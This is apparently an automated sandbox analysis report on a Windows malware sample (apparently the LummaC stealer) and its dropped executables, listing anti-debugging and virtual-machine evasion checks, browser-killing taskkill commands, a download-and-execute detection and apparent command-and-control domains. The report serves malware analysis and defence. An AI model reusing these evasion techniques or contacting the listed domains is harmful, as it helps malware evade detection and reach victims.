Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5772	Thread sleep time: -176088s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4916	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300	Thread sleep count: 892 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300	Thread sleep time: -1784892s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe TID: 1852	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 7988	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 3396	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 2792	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 5336	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 8184	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe TID: 7240	Thread sleep count: 121 > 30
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe TID: 7240	Thread sleep count: 131 > 30
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe TID: 7816	Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe TID: 7816	Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe TID: 7692	Thread sleep count: 63 > 30

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C61EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

6_2_6C61EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000002.2119527104.000000000112F000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2145483793.000000000067F000.00000040.00000001.01000000.00000008.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2581096431.0000000000C03000.00000040.00000001.01000000.00000009.sdmp, DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2447658579.000000000032A000.00000040.00000001.01000000.0000000B.sdmp, e192e43b61.exe, 0000000A.00000002.3019575810.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, e192e43b61.exe, 0000000B.00000002.3017600863.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, b0b9f39429.exe, 0000000C.00000002.2750429124.0000000000F83000.00000040.00000001.01000000.00000011.sdmp, e192e43b61.exe, 0000000D.00000002.3019869572.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, b0b9f39429.exe, 0000001A.00000002.2902863863.0000000000F83000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000003.2077918179.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\\
Source: e192e43b61.exe, 0000000B.00000002.3029538393.0000000001398000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.0000000001933000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.000000000142A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW ,F
Source: file.exe, file.exe, 00000000.00000003.1786901695.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732244600.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800136771.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2899300146.000000000113C000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000002.3032979304.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824471510.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883910847.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: firefox.exe, 0000001D.00000002.2964932071.000001E75E6B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: firefox.exe, 0000001D.00000002.2959104555.000001E7545E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: e192e43b61.exe, 0000000D.00000002.3031046367.000000000105B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: e192e43b61.exe, 0000000B.00000003.2824471510.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883910847.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000002.3030925786.0000000001403000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWMY
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareHI
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.000000000127E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareFlc
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000002.2119527104.000000000112F000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, 00000005.00000002.2145483793.000000000067F000.00000040.00000001.01000000.00000008.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2581096431.0000000000C03000.00000040.00000001.01000000.00000009.sdmp, DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2447658579.000000000032A000.00000040.00000001.01000000.0000000B.sdmp, e192e43b61.exe, 0000000A.00000002.3019575810.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, e192e43b61.exe, 0000000B.00000002.3017600863.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, b0b9f39429.exe, 0000000C.00000002.2750429124.0000000000F83000.00000040.00000001.01000000.00000011.sdmp, e192e43b61.exe, 0000000D.00000002.3019869572.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, b0b9f39429.exe, 0000001A.00000002.2902863863.0000000000F83000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000003.2040272983.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P,
Source: e192e43b61.exe, 0000000A.00000003.2899300146.000000000113C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWa

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

Code function: 4_2_050400EB rdtsc

4_2_050400EB

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C6EAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_6C6EAC62

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C6EAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_6C6EAC62

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b0b9f39429.exe PID: 8148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b0b9f39429.exe PID: 3916, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe, type: DROPPED

LummaC encrypted strings found

Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: presticitpo.store

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe "C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe "C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001608001\num.exe "C:\Users\user\AppData\Local\Temp\1001608001\num.exe"	Jump to behavior

Uses taskkill to terminate processes

Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C734760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

6_2_6C734760

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C611C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

6_2_6C611C30

Source: 5e28f62265.exe, 0000000E.00000000.2797533174.00000000009B2000.00000002.00000001.01000000.00000012.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2581096431.0000000000C03000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Program Manager
Source: e192e43b61.exe, 0000000A.00000002.3022668199.0000000000BC3000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: &Program Manager
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000002.2119527104.000000000112F000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2145483793.000000000067F000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: `Program Manager
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2448369339.0000000000381000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: fProgram Manager
Source: firefox.exe, 0000001D.00000002.2944162932.0000009976DFB000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?ProgmanListenerWi

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C6EAE71 cpuid

6_2_6C6EAE71

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
